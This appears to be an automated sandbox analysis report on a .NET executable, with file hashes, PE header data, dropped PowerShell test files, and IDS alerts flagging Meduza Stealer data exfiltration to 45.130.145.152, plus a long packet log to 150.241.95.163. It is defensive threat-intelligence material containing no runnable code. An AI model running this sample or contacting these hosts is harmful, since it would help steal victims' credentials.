Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s001qxw5.2ya.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tm2bg4am.j3g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twewbqs0.kil.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.982896837473748
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9RM52QaURq.exe
File size:	37'376 bytes
MD5:	9913a016528f9d9c4aac737c6a06c596
SHA1:	197435ebdeab5f6df6e10d1c5aec40812cb9dfdf
SHA256:	ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f
SHA512:	d7013c2edf7245989e1a38e9f4a85aa22e4168c609920d73ecbd9f9006a9060ab78e2ef77a7d22371404b0241a36103b4824287ddb263a495303df12f99c6791
SSDEEP:	768:vdfxnLzsA5NVk9FrHE7be6C5jLjkmBcgYcV6kizh:vdfxnLd5yB5jFco6kiz
TLSH:	FCF2F74063F85225FAFB3F74A8B516240F76BC6AAD39E65C3588108E1AB2F54C970773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t............."...0..x..........b.... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x409662
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB9F2BE74 [Fri Nov 9 13:30:28 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9610	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x1514	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9574	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7668	0x7800	6242d7b63f2b88ad2a0015f8e3e95be8	False	0.37470703125	data	4.788650567844553	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x1514	0x1600	8549064275cae1a1a2e77bb59446ca21	False	0.3854758522727273	data	5.3792251226562655	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	09bd080e14f154bbaf62e06d6b1d885c	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa090	0x34c	data			0.4087677725118483
RT_MANIFEST	0xa3ec	0x1123	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.4043765671301573

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T10:36:32.156044+0100	2049441	ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt	1	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.156044+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.156044+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.161151+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.161151+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.6	49920	45.130.145.152	15666	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 10:35:54.943780899 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:54.948726892 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:54.948862076 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:54.949767113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:54.954587936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.836993933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837017059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837032080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837110996 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.837383986 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837424040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837460995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837481976 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.837496996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837511063 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.837533951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837570906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837605000 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.837605953 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.837650061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.842885017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.842921019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.842955112 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.843010902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.843014956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.843158960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.984306097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.984343052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.984427929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.988585949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.988670111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.988724947 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:55.998414993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.998444080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:55.998509884 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.007503033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.007554054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.007608891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.012804031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.012831926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.012886047 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.017776012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.017811060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.017844915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.017862082 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.027940035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.027973890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.028003931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.028007984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.028059006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.040213108 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.040254116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.040312052 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.101299047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.101317883 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.101401091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.105619907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.105633974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.105688095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.115174055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.115205050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.115464926 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.124264002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.124295950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.124352932 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.129409075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.129437923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.129492998 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.134681940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.134712934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.134767056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.136676073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.136706114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.136766911 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.145251036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.145287991 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.145323992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.145353079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.155374050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.155409098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.155443907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.155469894 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.155505896 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.218529940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.218564034 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.218651056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.222671986 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.222702026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.222750902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.232239008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.232273102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.232342005 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.241525888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.241661072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.241714954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.251540899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.251560926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.251579046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.251611948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.261948109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.261990070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.262010098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.262025118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.262073994 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.269871950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.269954920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.270006895 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.272316933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.272373915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.272413969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.272419930 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.272444963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.272489071 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.340085030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.340136051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.340172052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.340188980 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.358515978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.358551025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.358582020 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.358587980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.358649969 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.368717909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.368737936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.368752956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.368786097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.378912926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.378948927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.378983974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.378989935 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.379038095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.389394045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.389439106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.389476061 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.389491081 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.430059910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.430146933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.430177927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.430212021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.430222034 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.430222034 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.457257986 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.457364082 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.457396030 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.457400084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.457454920 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.475743055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.475776911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.475812912 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.475836992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.486069918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.486124039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.486161947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.486172915 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.486219883 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.496190071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.496222973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.496300936 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.506869078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.506922007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.506961107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.506995916 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.547441959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.547496080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.547535896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.547588110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.547588110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.574455976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.574492931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.574528933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.574563980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.574667931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.574667931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.592859983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.592895985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.592928886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.592953920 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.603142977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.603178978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.603199959 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.603213072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.603265047 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.623733044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.623773098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.623807907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.623826027 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.623841047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.623876095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.623888016 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.664611101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.664654970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.664686918 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.664690018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.664745092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.691713095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.691747904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.691781044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.691925049 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.710366011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.710401058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.710433006 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.710553885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.710555077 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.720839024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.720874071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.720906973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.720931053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.741055965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741130114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741127968 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.741195917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741231918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741240978 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.741266012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741300106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.741312981 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.781955957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.782007933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.782013893 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.782046080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.782088995 CET	49741	80	192.168.2.6	150.241.95.163
